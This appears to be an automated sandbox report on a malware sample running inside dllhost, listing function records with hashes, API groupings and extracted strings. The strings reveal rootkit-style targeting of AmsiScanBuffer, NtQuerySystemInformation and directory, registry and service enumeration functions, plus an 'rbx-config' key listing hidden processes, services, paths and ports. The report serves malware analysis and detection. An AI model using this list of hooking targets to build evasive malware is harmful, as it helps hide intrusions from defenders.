                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: 1a80193d0f766137850bae72ad27f196f2d891f583836e1d2d3e11538b004712
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: 72B14F392106D182EB549F25D5507EDA3B6F784FA4F98D02EFE0953796EE3AC942C340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: cc2f18b715ae0725f4f8f33b901043d34b9f09f9d86957c9bf601e549c62b32f
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: 4E315C72205BC096EB609F60E8907EE7365F784744F48802EEE4E47B9AEF38C649C710
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: 42ca6ea816dedf3d30fb0ab1e63030c1245a70ea3a05e434282cdae36b03163b
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: D631197A205BC086EB648F61E8503ED6365F784758F48C42EEE4E47B96EF78C649CB10
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: e68e29e1ce493148a9ae8fda2822f3e6ca330f4f24bf30bbeedeecc665089977
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: C6411A36214BC096EB60CB25E8407EE73A5F7C8754F584129FE9D46B9AEF38C556CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: adc432bb5183885981e5b9bc7e981647834ee0baa15491edfdbf72a0d451b899
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: 50412E3A214BC086E760CB25E8403DE73A5F7C8768F548129FE9D46B9AEF39C556CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: 25d19e3a0ddd5ecf0d27a2bc40df2c51fdd1c3fcfd07469240084c2abf61e716
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: 29A1C4327046C069FB209B75E4547ED6BA2E7C5B94F184139FE992BADBEA78C443C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: 0405d07f92dc22dfe0be189a9cda41fcdb696dce3d09bf687db287bad1766575
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: 47A1E636B146C049FB209B75D4543ED6BA2B7C17B4F98C139BE59276DAEA35C443C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3414887735
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: 4dde19351ee34049f8d779fc3ff97b24cdf24396a305bf39a1337de63244f78e
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: B0715E36315A9095EB10DF21E990ADC2366FBC9B88F489139FE4D53B2AEF38C556C340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3414887735
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: 0e49696b8e29dfe5741e136925c9c7f6352625b565788e2d784bcdf7ae6b8811
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: 8471093A214AD095EB109F35E9906DC2376FBC9BACF88D129FD4D57A2AEE25C446C340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                                  • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 3993315683-3414887735
                                                  • Opcode ID: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                                                  • Instruction ID: 0bd1eed236b6321b202bdd9012a21668a5814f2879643e8febc2c05628ee43d5
                                                  • Opcode Fuzzy Hash: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                                                  • Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: fce56665e3a5096e5c7e543e3739f5a3155f2da18290102c895d9de897cb80fa
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: EB519C70154ACAA5EB04EB64ED807DC2322ABD0744F88857FBC5912167FE7D82ABC381
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: be671af5a41c3820cb1c3a35a4e93be96f5918437d6dee513164a2fbbfd816b7
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: DD51C478554AC6A1EA04DB74EDA07CC2322B7D4365FC8C43FBC5912167BEB9828BC390
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: 8157b280c978a86e3987e94b0a740eb8e8d56a14393275f44b5f87ddd5e2c63a
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: 3D513A32614B8496E724CF62E54879E77A2F7C9B98F488128EE8D07719EF3CC05AC740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: 03a4fd040867b9cc4c4f4c901a221fb721c0f6ab6c344da5c350f5ed1ab9e050
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: 58513A36614BC496EB24CF62E54839E77A2F7C9BA8F48C128EE4907719EF3CC0468740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: 457315a2485e6d78fc157177cee4b5a0d465d6f2f406062a6a76825a3094f1be
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: 50518A3170268461EE149B56EA007ED23A2AB89BB0F9C473DBE3D473D6FB38C5478640
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: 349912e1a4fa7d2850ed19bfc267d7d324cc4c07f0b8daaf9d845d296e97078f
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: 80518E397016C451EA149B66E9403ED22A2BB89BB4FDCC73CAE7D473D2FB39D4468640
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: c5fb552c9e61cd1e98144d0ec0c9e938c3678fa9fe6a84a545c7699448832b0e
                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: F2315C32600A80A6EB21DB12E94479DA3A2F7D8F95F48457DBE4D43626EF3CC55BC740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
                                                  • Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: 267318a4f7eb95769c02ec43edcd79215f1b4e247010818f431d15dbaa9f3ad6
                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: 31314135A00AC096EB21DF22E94479DA3A2B7D8FA5F88C53DBD4942626EF3CC5578740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true
                                                  • Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: e55fc0ff8eda16f24bdd03160734256f8f822449fb435367887c55b7d741a8c6
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: D431FB31610B859AE750DF22E984B9D63A2BBC8F95F48813DEE4E43726EF3CC4578600
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true
